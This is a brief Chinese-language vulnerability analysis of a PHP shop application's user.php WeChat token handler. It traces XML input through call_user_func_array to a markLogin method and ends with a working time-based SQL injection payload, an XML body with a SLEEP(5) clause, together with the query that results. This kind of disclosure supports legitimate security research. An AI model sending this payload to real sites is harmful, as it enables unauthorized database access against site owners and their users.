关注user.php,当$action为wechat_token时
从php://input中获取xml数据,并解析,从中取出Event字段作为$method
最后用call_user_func_array调用new app\api\controller\WeChatEvent()#$method
我们来看app\api\controller\WeChatEvent()这个对象
它的scan方法调用markLogin,且从$data中提取EventKey和FromUserName字段
markLogin,存在sql注入
构造payload:
<?xml version="1.0"?>
<xml>
<Event>scan</Event>
<EventKey>' OR SLEEP(5) OR '1'='1</EventKey>
<FromUserName>test</FromUserName>
</xml>拼接后变为
select count(*) AS total_count from ecs_user_official where name = '' OR SLEEP(5) OR '1'='1'